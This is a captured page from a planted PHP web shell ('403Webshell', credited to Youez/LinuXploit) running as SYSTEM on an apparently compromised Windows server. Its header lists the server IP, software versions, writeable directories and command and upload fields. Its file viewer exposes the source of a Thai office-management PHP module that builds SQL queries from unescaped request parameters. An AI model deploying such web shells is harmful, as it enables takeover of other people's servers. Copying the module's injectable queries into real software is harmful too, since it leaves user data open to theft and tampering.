403Webshell
Server IP : 104.21.80.248  /  Your IP : 162.159.115.41
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myoffice/2565/modules_22222/user/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/myoffice/2565/modules_22222/user/user_odgroup.php
<?
CheckUser($_SESSION['user_user'], $_SESSION['user_pwd']);
?>
<table cellspacing="0" cellpadding="0" width="100%" height=420 border="0">
        <tbody>
        <tr>
        <td align="left"Valign="top"><br />
        <b><img src="images/icon/plus.gif" border="0" align="absmiddle" /> <a href="?name=admin&file=user_la">จัดการบุคลากรทปฏิบัติหน้าที่เจ้าหน้าที่หัวหน้ากลุ่มงาน</a> 
         <br />
 <!-- แสดงผลรายการ -->
  <?
if($_GET[op] == "minepass_edit" AND $_GET[action] == "edit"){
	//////////////////////////////////////////// กรณีแก้ไขข้อมูลส่วนตัว
	if(CheckLevelUser($_SESSION['user_user'],$_GET[op])){
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
//		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='".$_GET[id]."' ");
		$arr[user] = $db->fetch($res[user]);
		$db->closedb ();

			if(!$_POST[TURAKAN] ){
				$ProcessOutput .= "<BR><BR>";
				$ProcessOutput .= "<CENTER><IMG SRC=\"images/icon/notview.gif\" BORDER=\"0\"><BR><BR>";
				$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>กรุณากรอกข้อมูลต่างๆให้ครบถ้วน</B></FONT><BR><BR>";
				$ProcessOutput .= "<A HREF=\"javascript:history.go(-1);\"><B>กลับไปแก้ไข</B></A>";
				$ProcessOutput .= "</CENTER>";
				$ProcessOutput .= "<BR><BR>";
			}
				//ทำการแก้ไขข้อมูลลงดาต้าเบส
				$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
				$db->update_db(TB_user,array(
					"odgroup"=>"$_POST[ODGROUP]",
					"update_date"=>"".TIMESTAMP.""						
					)," id='$_GET[id]' ");				
				$db->closedb ();
				$ProcessOutput .= "<BR><BR>";
				$ProcessOutput .= "<CENTER><A HREF=\"".$URLre."\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
				$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการแก้ไขข้อมูลเรียบร้อยแล้ว</B></FONT><BR><BR>";
				$ProcessOutput .= "<meta http-equiv=\"refresh\" content=\"1 ;url=?name=user&file=user_odgroup\">";
				$ProcessOutput .= "</CENTER>";
				$ProcessOutput .= "<BR><BR>";
		
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}else if($_GET[op] == ""){
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$limit = 30 ;
$SUMPAGE = $db->num_rows(TB_user,"id","working='".$arr[user][working]."' and status='1' ");
$page=$_GET[page];
if (empty($page)){
$page=1;
}
$rt = $SUMPAGE%$limit ;
$totalpage = ($rt!=0) ? floor($SUMPAGE/$limit)+1 : floor($SUMPAGE/$limit); 
$goto = ($page-1)*$limit ;
?>
<table width="100%" align="center" cellspacing="2" cellpadding="1" >
        <tr bgcolor="#990000" height="25">
        <td><div align="center"><font color="#FFFFFF"><b>ที่</b></font></div></td>
        <td><div align="center"><font color="#FFFFFF"><b>ชื่อ - นามสกุล</b></font></div></td>
		<td><div align="center"><font color="#FFFFFF"><b>ปฏิบัติหน้าที่</b></font></div></td>
        <td><div align="center"><font color="#FFFFFF"><b>สถานะ</b></font></div></td>     
		<td><div align="center"><font color="#FFFFFF"><b>จัดการ</b></font></div></td> 
        </tr>
 <?
//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE working='".$arr[user][working]."' and status='1' ORDER BY level ASC LIMIT $goto, $limit ");
		$count=0;
		$i=1;
		while($arr[user] = $db->fetch($res[user])){
?>
                  <tr>
					<td width="60" align="center"><? echo"".$i?></td>  
                    <td width="200" ><? echo $arr[user][category_name];?></td> 
					<td align="center" width="200" >
<?
					 if($arr[user][odgroup]==4){ 	  
?>
					<font color=blue>หัวหน้ากลุ่มงาน</font>
<?}?>
					</td>
                    <td align="center" width="300" >
					<form method="post" action="?name=user&file=user_turakan&op=minepass_edit&action=edit&id=<? echo $arr[user][id];?>" enctype="multipart/form-data">
<?
					 if($arr[user][odgroup]==4){ 	  
?>
					<INPUT TYPE="checkbox" NAME="ODGROUP" VALUE="4" checked>หัวหน้ากลุ่มงาน
<?}?>
<?
					 if($arr[user][odgroup]!=4){ 	  
?>
					<INPUT TYPE="checkbox" NAME="ODGROUP" VALUE="4" >หัวหน้ากลุ่มงาน
<?}?>
					</td>
                    <td align="center" width="100"><input type="submit" value=" บันทึก " /></form></td>
                    </tr>
<?
$i++;
 } 
?>
                     </table>
                                                                
 <?
	SplitPage($page,$totalpage,"?name=user&file=user_turakan");
	echo $ShowSumPages ;
	echo "<BR>";
	echo $ShowPages ;
	echo "<BR><BR>";
}

?>
			</td>
          </tr>
        </tbody>
      </table>
	 
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit